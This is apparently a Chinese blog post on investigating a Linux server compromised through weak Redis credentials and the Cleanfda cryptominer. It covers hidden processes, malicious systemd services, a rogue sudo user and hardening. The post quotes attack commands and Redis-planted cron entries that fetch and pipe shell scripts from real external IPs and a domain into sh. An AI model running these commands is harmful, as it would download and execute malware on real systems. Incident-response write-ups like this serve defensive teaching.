一次Linux服务器入侵排查
Linux服务器入侵排查
一、事件起因
起因:阿里云的云安全中心进行告警,一台服务器执行了恶意代码。
查看恶意脚本代码执行的详情:
三条报警信息执行的命令行如下:
curl -fsSL http://45.133.203.192/cleanfda/init.sh | sh
wget -q -O- http://194.87.139.103:8080/cleanfda/init.sh | sh
wget -q -O- http://oracle.zzhreceive.top/b2f628/b.sh | sh
由上述阿里云云安全中心报警可知三次报警都是去境外服务器下载恶意脚本并执行,由下载的脚本url可知下载的应该为Cleanfda挖矿木马。执行执行时间为11:20~11.35。
二、排查过程
恶意进程排查:
登录服务器,进行排查。
使用netstat命令查看端口连接情况,netstat -antlp | more。
发现大量异常的请求连接,如下。
查询IP地址为国外IP。
使用top查看系统中各个进程的资源占用状况,显示系统资源消耗并不高。
而使用uptime查看系统负载发现负载很高。
由此分析恶意进程可能被隐藏了,猜测恶意进程修改了centos 的动态链接库配置文件ld.so.preload内容。查看该配置文件。
a 只能以追加模式编辑,适用于各种日志文件,只有超级用户可以设置或清除该属性
i 不能进行任何修改,为关键文件加锁,只有超级用户可以设置或清除该属性
而后再使用top查看进程,发现有一进程[kswapd0]的cpu使用率极高。
使用kill命令尝试杀死该进程,结束该进程后,又会更换一个PID启动。使用ps查看发现该进程的程序文件存放目录为 /var/tmp/.copydie。
查看定时任务,确定是否为定时任务启动。
发现并不是,而后查看开启自启服务,发现有该进程的服务 kswapd0.service。
systemctl list-unit-files --type=service | grep "enable"
查看该服务状态,发现其启动的就是/var/tmp/.copydie下的恶意进程。
停止该服务。
重新使用top查看,发现还有两个之前写入ld.so.preload的隐藏恶意进程。
同理发现其也作为服务启动。而后将服务自启关闭
systemctl disable kswapd0
systemctl disable pnscan
systemctl disable masscan
而后使用uptime和top查看系统资源使用情况已恢复正常。
入侵原因分析:
查看登录日志,比对登录失败与登录成功的账户,确定并不是暴力破解。
登录失败IP
grep "Failed password for root" /var/log/secure | awk '{print $11}' | sort | uniq -c | sort -nr
登录成功IP
grep "Accepted " /var/log/secure | awk '{print $11}' | sort | uniq -c | sort -nr
分析该台服务器上的部署业务,该台服务器安装了redis、tomcat、mysql等,使用RedisDesk连接redis数据库,发现db0中有四个键值,确定为使用redis写入下载恶意脚本并执行的定时任务。
*/2 * * * * root cd1 -fsSL http://195.58.38.171/cleanfda/init.sh | sh */3 * * * * root wget -q -O- http://195.58.38.171/cleanfda/init.sh | sh */4 * * * * root curl -fsSL http://45.133.203.192/cleanfda/init.sh | sh */5 * * * * root wd1 -q -O- http://45.133.203.192/cleanfda/init.sh | sh
三、后续处理 删除恶意服务 删除/etc/systemd/system下的服务。
删除/etc/systemd/system/default.target.wants/下恶意服务的链接文件。
2.删除恶意程序 删除/var/usr/tmp/.copydie目录及目录下的恶意文件。
查看并删除/tmp目录下的恶意文件。
3.用户账户排查 查看Linux用户,发现用户 hilde。 查看/home目录,发现11:33创建了一个新用户的家目录 hilde 。
查看/etc/passwd文件。
删除用户 hidle userdel -r hidle
查看/etc/sudoers文件,发现hidle用户拥有sudo权限,修改文件,删除该行。
4.进行相应安全加固 redis 更换强密码,监听固定IP,更改默认端口。 四、总结 本次linux入侵事件,经分析大概率为使用redis未授权漏洞写入定时任务执行下载恶意挖矿程序并执行。而该服务器上的redis口令较弱,导致攻击者利用。由本次入侵事件,可知安全加固必不可少,要注意系统中的薄弱项。
登录
前往注册账号注册
注册成功,默认密码已通过短信发送给您
欢迎来到蜗牛学苑~
我们仍旧想要当初想要的不一样,世间浮沉,到最后还是想要和当初想要的和别人不一样。
3小时前 2人点赞